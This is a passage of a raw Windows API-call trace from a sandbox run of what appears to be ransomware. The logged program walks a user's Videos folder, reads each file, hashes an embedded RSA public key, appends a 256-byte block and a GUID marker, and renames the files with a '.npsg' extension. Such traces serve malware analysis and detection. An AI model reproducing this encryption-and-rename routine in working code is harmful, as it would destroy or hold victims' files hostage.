KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0245.784] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0245.785] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0245.785] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a220) returned 1 [0245.786] CryptCreateHash (in: hProv=0x67a220, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0245.786] CryptHashData (hHash=0x33f0488, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0245.786] CryptGetHashParam (in: hHash=0x33f0488, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0245.786] CryptGetHashParam (in: hHash=0x33f0488, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0245.786] GetLastError () returned 0x0 [0245.786] CryptDestroyHash (hHash=0x33f0488) returned 1 [0245.786] CryptReleaseContext (hProv=0x67a220, dwFlags=0x0) returned 1 [0245.786] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0245.786] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0245.786] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0245.786] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0245.787] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0245.787] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0245.788] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x13426, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.788] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0245.788] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0245.788] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0245.788] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0245.789] CloseHandle (hObject=0x644) returned 1 [0245.792] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xe0) returned 0x3b8bce8 [0245.792] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8f0) returned 0x3b8ccd0 [0245.792] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8bce8 | out: hHeap=0x620000) returned 1 [0245.792] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\arnu9pMGj4v\\FVtB8RwkjP B1jt\\bJA8kVc76v-v6Q-z7wT-.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2 m12kpqjt__iy\\nraxht\\arnu9pmgj4v\\fvtb8rwkjp b1jt\\bja8kvc76v-v6q-z7wt-.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\arnu9pMGj4v\\FVtB8RwkjP B1jt\\bJA8kVc76v-v6Q-z7wT-.swf.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2 m12kpqjt__iy\\nraxht\\arnu9pmgj4v\\fvtb8rwkjp b1jt\\bja8kvc76v-v6q-z7wt-.swf.npsg")) returned 1 [0245.793] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8ccd0 | out: hHeap=0x620000) returned 1 [0245.793] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0245.793] VirtualFree (lpAddress=0x39b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0245.795] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0245.795] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97b809a0, ftCreationTime.dwHighDateTime=0x1d5bbf5, ftLastAccessTime.dwLowDateTime=0xe37a4e20, ftLastAccessTime.dwHighDateTime=0x1d5bda3, ftLastWriteTime.dwLowDateTime=0xe37a4e20, ftLastWriteTime.dwHighDateTime=0x1d5bda3, nFileSizeHigh=0x0, nFileSizeLow=0x10a93, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Q10yZ 6bCy0JTQxX9UC5.swf", cAlternateFileName="Q10YZ6~1.SWF")) returned 1 [0245.795] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0245.795] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x106) returned 0x3b7b948 [0245.795] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0245.795] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\arnu9pMGj4v\\FVtB8RwkjP B1jt\\Q10yZ 6bCy0JTQxX9UC5.swf") returned=".swf" [0245.795] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\arnu9pMGj4v\\FVtB8RwkjP B1jt\\Q10yZ 6bCy0JTQxX9UC5.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2 m12kpqjt__iy\\nraxht\\arnu9pmgj4v\\fvtb8rwkjp b1jt\\q10yz 6bcy0jtqxx9uc5.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0245.797] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=68243) returned 1 [0245.797] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39b0000 [0245.799] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x10a6d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.799] ReadFile (in: hFile=0x644, lpBuffer=0x39b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39b0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0245.801] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0245.801] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0245.801] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0245.801] ReadFile (in: hFile=0x644, lpBuffer=0x39b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39b0000*, lpNumberOfBytesRead=0x39afb70*=0x10a93, lpOverlapped=0x0) returned 1 [0245.803] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0245.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0245.803] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0245.803] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0245.803] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a220) returned 1 [0245.804] CryptCreateHash (in: hProv=0x67a220, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0245.804] CryptHashData (hHash=0x33f0488, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0245.804] CryptGetHashParam (in: hHash=0x33f0488, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0245.804] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0245.804] CryptGetHashParam (in: hHash=0x33f0488, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0245.804] GetLastError () returned 0x0 [0245.804] CryptDestroyHash (hHash=0x33f0488) returned 1 [0245.804] CryptReleaseContext (hProv=0x67a220, dwFlags=0x0) returned 1 [0245.804] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0245.804] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0245.804] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0245.804] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1a38 [0245.805] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0245.805] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0245.805] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0245.805] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10a90) returned 0x3b99d50 [0245.805] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0245.805] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1a38 | out: hHeap=0x620000) returned 1 [0245.805] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0245.805] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1a38 [0245.805] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0245.805] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecb68 [0245.805] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b8fc88 [0245.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89090 [0245.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b8fcd0 [0245.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89000 [0245.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89030 [0245.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b890c0 [0245.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89060 [0245.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0245.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b7fce8 [0245.806] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0245.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x3b8ccd0 [0245.806] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89030 | out: hHeap=0x620000) returned 1 [0245.806] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89060 | out: hHeap=0x620000) returned 1 [0245.806] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b890c0 | out: hHeap=0x620000) returned 1 [0245.806] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0245.806] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8ccd0 | out: hHeap=0x620000) returned 1 [0245.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b890c0 [0245.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373538 [0245.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b89060 [0245.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0245.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x3b89030 [0245.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373548 [0245.807] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7ba60 [0245.807] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd518 [0245.807] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0245.807] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0245.807] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7bc90 [0245.807] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8660 [0245.807] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x33734f8 [0245.807] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0245.807] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89060 | out: hHeap=0x620000) returned 1 [0245.807] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0245.807] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89030 | out: hHeap=0x620000) returned 1 [0245.807] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0245.807] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0245.807] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b890c0 | out: hHeap=0x620000) returned 1 [0245.807] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd518 | out: hHeap=0x620000) returned 1 [0245.807] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecb68 | out: hHeap=0x620000) returned 1 [0245.807] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0245.807] GetCurrentThreadId () returned 0x5b4 [0245.807] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0245.807] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b8a708 [0245.807] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c1920 [0245.807] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a220 [0245.807] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x33c2ee8 [0245.808] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0245.808] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0245.808] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0245.808] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0245.808] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0245.808] GetCurrentThreadId () returned 0x5b4 [0245.808] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0245.808] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0245.808] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x340dd38 [0245.808] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0245.808] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0245.808] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0245.808] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0245.808] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0245.808] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x340dd38 [0245.809] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x10a93, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.809] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0245.809] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0245.809] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0245.809] CloseHandle (hObject=0x644) returned 1 [0245.812] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xe0) returned 0x3b8bce8 [0245.812] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8f0) returned 0x3b8ccd0 [0245.812] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\arnu9pMGj4v\\FVtB8RwkjP B1jt\\Q10yZ 6bCy0JTQxX9UC5.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2 m12kpqjt__iy\\nraxht\\arnu9pmgj4v\\fvtb8rwkjp b1jt\\q10yz 6bcy0jtqxx9uc5.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\arnu9pMGj4v\\FVtB8RwkjP B1jt\\Q10yZ 6bCy0JTQxX9UC5.swf.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2 m12kpqjt__iy\\nraxht\\arnu9pmgj4v\\fvtb8rwkjp b1jt\\q10yz 6bcy0jtqxx9uc5.swf.npsg")) returned 1 [0245.814] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x259b7e80, ftCreationTime.dwHighDateTime=0x1d5c4e5, ftLastAccessTime.dwLowDateTime=0x165c8610, ftLastAccessTime.dwHighDateTime=0x1d5bc22, ftLastWriteTime.dwLowDateTime=0x165c8610, ftLastWriteTime.dwHighDateTime=0x1d5bc22, nFileSizeHigh=0x0, nFileSizeLow=0x6222, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tJ1P.mkv", cAlternateFileName="")) returned 1 [0245.814] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0245.814] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x106) returned 0x3b7b948 [0245.815] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\arnu9pMGj4v\\FVtB8RwkjP B1jt\\tJ1P.mkv") returned=".mkv" [0245.815] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\arnu9pMGj4v\\FVtB8RwkjP B1jt\\tJ1P.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2 m12kpqjt__iy\\nraxht\\arnu9pmgj4v\\fvtb8rwkjp b1jt\\tj1p.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0245.815] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=25122) returned 1 [0245.815] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39b0000 [0245.818] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x61fc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.818] ReadFile (in: hFile=0x644, lpBuffer=0x39b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39b0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0245.820] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0245.820] ReadFile (in: hFile=0x644, lpBuffer=0x39b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39b0000*, lpNumberOfBytesRead=0x39afb70*=0x6222, lpOverlapped=0x0) returned 1 [0245.821] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0245.821] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0245.821] lstrlenA (lpString="-----BEGIN PUBLIC 